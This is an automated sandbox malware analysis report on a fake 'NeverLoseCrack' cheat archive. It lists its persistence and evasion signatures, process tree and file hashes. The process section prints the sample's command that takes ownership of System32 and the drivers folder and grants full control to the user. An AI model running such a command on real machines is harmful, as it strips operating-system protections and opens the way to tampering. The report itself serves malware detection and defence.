Malware Analysis Report

2024-12-07 14:41

Sample ID: 241006-1fx7ea1epa
Target: NeverLoseCrack-main.zip
SHA256: d893667722ead622a8309c287f75d5e31aa8614db99ddf3866d1956d4ec83219
Tags: discovery, evasion, exploit, persistence
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: d893667722ead622a8309c287f75d5e31aa8614db99ddf3866d1956d4ec83219

Threat Level: Known bad

The file NeverLoseCrack-main.zip was found to be: Known bad.

Malicious Activity Summary

discovery evasion exploit persistence

Modifies WinLogon for persistence

Possible privilege escalation attempt

Disables Task Manager via registry modification

Checks computer location settings

Modifies file permissions

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-10-06 21:36

Signatures

Unsigned PE


Analysis: behavioral2

Detonation Overview

Submitted: 2024-10-06 21:36
Reported: 2024-10-06 21:39
Platform: win10v2004-20240802-en
Max time kernel: 150s
Max time network: 145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe"

Signatures

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2044 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe C:\Windows\System32\cmd.exe
PID 3328 wrote to memory of 2900 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3328 wrote to memory of 1092 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3328 wrote to memory of 4008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3328 wrote to memory of 3400 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2044 wrote to memory of 316 N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 4880 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 3192 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 316 wrote to memory of 2132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NeverLoseCrack.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=2jTr0Dq_kmE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4a0 0x2f4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=2jTr0Dq_kmE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,11367119642060353249,10333889013628265743,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=2jTr0Dq_kmE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7fb46f8,0x7ffcc7fb4708,0x7ffcc7fb4718


Network


Files

SHA512 7fe8d5253df558c9ea8a99aff097c34adb39047ae94aeb64a934346b9853fccda6f9791c5b7193cac0ac0c5999e0f82bfda92a6ae462ae3431904c41650957e2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\9c39b2dd-5d50-4166-8209-1a020eb2bf0a.tmp

MD5 e57530a3dd0cb56ec3f6d8a9abf403eb
SHA1 52181d3897bf8583afb82229a61a0ae5cb82dd34
SHA256 fde8edc4c5ab83afb2a27a040d812c4df65f32063f1d846ee325ddb772dd4958
SHA512 7bace1f5144c5ede18fa1f7cfabe35161b0fcb8bc78744896a151cc95b96bd0b7c016141a8c04867b0839ec0c55a45d4e80f0301bdd432cace8cdd1364406b17

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bb8b8f5c5dd3b2b1dafc7efe811bc1ce
SHA1 912c3f6e385b693878645015a71990c1bf9de9d9
SHA256 696c08e148056468dff657176291c66ca8de508af34e30b1d75fdab96ac753e5
SHA512 445cf8f180e67fc58797e8afaf05abfbd0ecf9639fff96634dd776a905dcc380d989bd1fbb71b472b627348ab9c213625a7bcd388c2e4bb6a26b138de9bcf359

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 e2039d4e89f17fabb6a619fd1b95f7de
SHA1 fcc2f3232263513fd61ac9d12a7d336e615da8cb
SHA256 06303acaac3e1200c78c70c441acee055f7511840370f9e4c548c4efb42eb622
SHA512 29211f7be32c181552deacce9e7ca49ebd0545a23c4f99d916da818ef071ad5f9aaadaf1f3b292d3384e59a53b44f8edbf07cb3a83c149729dfc524c7a9bfb2e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 2ce3541e27f36190d836efeac6c3555b
SHA1 0936a8fa8335a7c2ea9b7c03ed49e5f4c2810db7
SHA256 095c54d5e96be6f6fa7765ea0abe5609e36ad2477f489dde0a3141c0089b3510
SHA512 b7fdd821f0add93c9d5fd696709d7b361d3783c0139ef4a70192c629fe90f68473ed5cd2872e9f412b73317e7b82352cd9825d3dda92e1b3a0a43f3d9f50e36f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

MD5 7c2224075fd41741e27aab8e01cc338a
SHA1 61ab9ba861743b87f8af0c55e977aa1c653f8d73
SHA256 efaecafb3b690ff5bddf38ffb089a715f083e311ae55761697fcd3ba69b5a141
SHA512 d6dbda96d49ff4b36d6906dcf001e7ffbbd953e06a347abd5d3db8784feda2d134b875f7612611061628ba175656fcb6da378e8bd06764a287add3e64e33ce82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

MD5 7680465c99b9bbd9eb5e3055a95ff481
SHA1 4f035af69ca6076226746c23e900846846dce364
SHA256 b53b1d67494e1a4c85056d2bbd233fb9241dd02d88261f72aacf17584f0731e1
SHA512 3c78423f29234a1bc867a73f3c8ddb792869fdb388537867a8d78e68d545386c6cd92891f05221194113ddbc822532184d0763ec329db396c7d41c4f59d447d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

MD5 c63acd09d7abf05d6087981958d3349d
SHA1 6a654ec747409592581ec6fdf5594a6e516846c5
SHA256 1ba6177f62935e6623f960004b38e76c47260fc47708006b9c5a9aa9c2aa4001
SHA512 e5e19cda45283496c4dcf8878d75fffb345431c6688042380040e9382be194ff2f2951288429bb1002df0fa9be77f4930ede6fa74c861f1916f8a75bf72cf64e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

MD5 329171b680f802225de8e319988de67a
SHA1 39b51c4bf371089bf2223f41f731dc3442b991e9
SHA256 5f785bd507da25f5698da1ae9281950ec415a560cb8058c4bd282582cd17014c
SHA512 7238601e40e049a3d0825bfc99633f5538c6929dbf0f14c848819d763d0e318d862ce342509555752305dbd64d2889d7bc287670166f5cf35564b785ea8dfa3b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

MD5 dea2845a168742c75f21eb3eecfd073b
SHA1 5317695bc387b1322068fd6a6b93196651865a12
SHA256 4812d8c0819d7375a860894444a505167bd45b212f6981faff32b0ad7712c06d
SHA512 6c8d9413a26bc75cd0219d0da8be77fbb2d8869d3fbec5ef3f922b44281da9878aa172d322629b67c9b758fc253a98aacfb18ffdaf5e2cbbd1e5cba55a05930d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

MD5 ea72a4e3b1d503709bf4894acc0d993b
SHA1 5dc1085aa6602623ba36d129cd14eaa2153eebb8
SHA256 a748205e9bd601df0b0beea943a4f3c9cf1ba5cddc17a7b8d72119057b0407e7
SHA512 72b1bb7d1739515be17253714ab74a3b8f8850b72dc5d391bea2caada0ed2bace4c5fe799ef4914f68ed2e817b74ba3d3aa1f31e1bfaef1618c23d02c7f1aa18

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

MD5 04f4c51c1b1ae4347d3ef9e63dd650f8
SHA1 87e0f582937e3aa332e9fe12b9bb0b8b45bfc418
SHA256 590d1c3dd1db6db4deb55d98a95fd11ed040d8ca1775f406558b66441b50e6ec
SHA512 9c271842736e0cfb9198bcc29003fe93b319984fa65ccc571fc5bbfbbc7165fe89effc76f9a2fa4d052bc44633badc2dc8bc73bb3b68022a4d1c626e386c23e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

MD5 6381aee94589eb62197302f2dcaceead
SHA1 f9c10d1b729d5958b698507afdc27fcdba8dbf78
SHA256 95aa54df31d1f8fc7fdbab297730882029b052eb9e79898ce4feaa6f3d6d52fe
SHA512 c169b380f85a532b8c84c2bf4fc910d103294d7dc060d1d10d8f11f004726bc3e81c8b611ca3d0311beb8773de1f89c28b20e4fce832f9f8f60baa53ecb754d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

MD5 5571d8719004cb53a65451e857eefa30
SHA1 99c8a889a8e6c14366b32ea5ab714d0005263a5c
SHA256 81a63d0ecbe981107ca5f6ac4138803453f1b20d05b741e67ee4bef0641552d2
SHA512 1d862137deb4cd270ec8dce26f44a5834aae9f3f2c9dd2e496ec1beb1aa430109b2bda5995a5c314fcac5fa6fb4e64e0b1c7cbc502cf23df9abf6410f9051621

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

MD5 2b175f9be1bc413666c2cb94b7b82aa6
SHA1 296e059cc0330c35c1a6bea8192c835894a63178
SHA256 0d7de85a8632a76524cf886ae28005a4e8b1c8f06cb19b30e0f51375a27cc0e9
SHA512 101552f23d0f961e17ca887724da8011f5dab7a1324ebb775e5d6c1e41718f4f2d6bec317aa9986fc8b28d8064adb0cde9fce827029da55762ed0558acae5606

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

MD5 214f75e42aa5cfca07257cbf8c64e83c
SHA1 ba4bbe71d4ab266bc145305217cdf86a7777137f
SHA256 a6760631fecfe59ed152aeb2c51fdcb515ac00cd4755449016b5b34813735d00
SHA512 e8d896c8c3509941fbce96e2847838a520b3bc8d94348b1121840a1a2a45328be939238423a03cdfb7823cf128eec3190de8b4c1924553d603ef02fa856217e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

MD5 7fda4c62c1bdeae7a08e6fd438104bac
SHA1 b1f626e78f5f6d7be993303a49eb81f0fa4ce57c
SHA256 4dbd328e347e890a801d51f9a5f8d38a3efd51ec34c0aa22cc83d0a95d6d9d71
SHA512 c4a36a3c1ff23023533dff103a108844b7cfe4e793aba0b1b5576431e77dd6e9edf29fad68132577ad6ad55ca7a011a38723da2fa15d9071d2c6ba4e02d1dadc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 5f056791b62579ef960de7325552211e
SHA1 10569ac2c43e7dc05b47b736e151a42382b1f409
SHA256 7c000ed3137907eed223ca526b66f1e2fad96239de40a9ed878588b16b4f0d93
SHA512 a05230d8530965dafbf6ddfb8bd1079a826861ff3cd36d633df31219491dbd72db16444563b6e47b1f8196cb9379cbfda63e137a330edf50902b9844d8b465f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002b

MD5 a5cc79fbd666432c461daec09604f082
SHA1 9a3df93d85aca657c5c8b60f9b4063128319647e
SHA256 9a7f91177674363a59d898f41192d993f0dab2ce2c93a180b6d1042ea4b9e279
SHA512 f93ebbb16738cae18477a0bd833098abee3a77880b8623ae2a462ee8e209487045121700e013dd0da1c7c3f5c9f24a56f02a5cba837df4ac1f33c9f6e3522c62

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026

MD5 4bb71581a47e597283a0da0f6bef0eaf
SHA1 536ece5dad210a9ad160eb1243f836ab18482410
SHA256 045771bfcf6c64cb008723fac614aee762de1c3b0f8f2e9895a37c788cd33966
SHA512 e481ebc6878a88a0cadc0123e5fc56ebfd549cfd76df69ef6d976c9015605b7d75092321f7f49d8c61cf611f3f9a39c96bfee995b7f9be3461f44e5379b79d19

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027

MD5 f730bff0cf8edaeb2843488eb25f2871
SHA1 f911d18a07b3dac9b6cbb8562e4589fb034bc31c
SHA256 e21091eeb35a537a27bdef9bfa0952083e2cc4bf8fd622b8bb5d4757f0eac12f
SHA512 6f5b0a66135b227f36cbbf4f0a2c5af95887a92ad4b59937cd1168d35fefa8860b2a08364f60f788b52c19b49bef3282edc70ec63d7b5b29a8d6909d3aea0e60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a865f2e2c267300be20c5eb310cf43bd
SHA1 4b44d7e62a9f4def96b6d1675fc6a107e35ee55b
SHA256 08d8304c1cbf6dc78b3e0f4c59ebb1289872c7731b6c9cc050e7072adacdabaa
SHA512 fb7181a0a6bdd8dc8bd292765107f799ec2806aa225e2ef6699ef18a13a64a6362ad27ca6bc5c67f8ca3064a10bd50cbf88331c1529f461680031b478ee65cfa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f123a0719bb2ba08806a61fb9ce3cbdd
SHA1 ea0c5e5071f125e0c8508449a0bb840094cd6d31
SHA256 fa8a890585b7b08ccf9c27dc0399964b780072c7a1196b25f614bff4d1f6defe
SHA512 54fb461c5e8058ea25d88a194f44631d9413bfec21f45bc29fcce2a646f4cba7b282526cf7e599605f632d3e866601587f5d23c973df40f0db5027d9128b0c63

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 d8873cbac3efe2a5036d6858af30c688
SHA1 3fad1362ca9842c8065842903e92a34caf1e589e
SHA256 6fe461cf28ee7a69910b21a299b7ed081bcb3bf99cacb6a591a9d77096771cbd
SHA512 2a4bee6d8bc4db460e0f8180e1442cf63c7dcd77c54951f75e7ca5ee5de88ac14874069ac4365e7c152cbc4809c87e9859505efa80d3a163f136723f667fcaba

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 ed5f4fcff84187b4d0cfcacc3ae77a1d
SHA1 6cbbcbd40b4796fcb171c23282e109b7c0a13e0e
SHA256 b7b832bc2cd853fa3111e32975bfee5abd3dd35a1378dc7d42e72c6c3bb94269
SHA512 2dc372fa2e761cc7dc8927779fefd5553871aa93027e86d5b688c427a9bbcd01c81fe2008de80cbf7519f9a1437bcd24f8e613f363b39efc47cd4df33e8a9226

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

MD5 87c2b09a983584b04a63f3ff44064d64
SHA1 8796d5ef1ad1196309ef582cecef3ab95db27043
SHA256 d4a4a801c412a8324a19f21511a7880815b373628e66016bc1785a5a85e0afb0
SHA512 df1f0d6f5f53306887b0b16364651bda9cdc28b8ea74b2d46b2530c6772a724422b33bbdcd7c33d724d2fd4a973e1e9dbc4b654c9c53981386c341620c337067

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

MD5 e383ef862f4c7f2a0c8914815681208d
SHA1 e280c3d5ac7a4168711d8ffb5943c86fe04b9d04
SHA256 37cd92c2c53e7a916e02f3c90a58ecc8510dd2663b6c8ec44407765802c9a90e
SHA512 e665e11c24e50520da6b83f877fa45fe94ed6eb502c4f9bbbbdc2fe539b54111d0a7c442c5828b1f58d000e3f90f33ab600dc9f120e4eee8748931378b265c48

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c4df5f49-38fe-4954-b9fa-f87f18695d62\index-dir\the-real-index

MD5 ec3bdf60fc94a1f5e5991bc03ca626a3
SHA1 70f31a31408c62799c315e910e7015efdaa5b944
SHA256 85065ed21f4ce54eac9f5d81c7294564ed04b1564fe723cc94f3669022cccc9e
SHA512 7a09579d085073a106f7b81ccee5db99ba4fddd235a61e9b2ac446dab9ac4452f9940798eba7a01b85073e915737791d69818ce2fc40a53e402f132102a26900

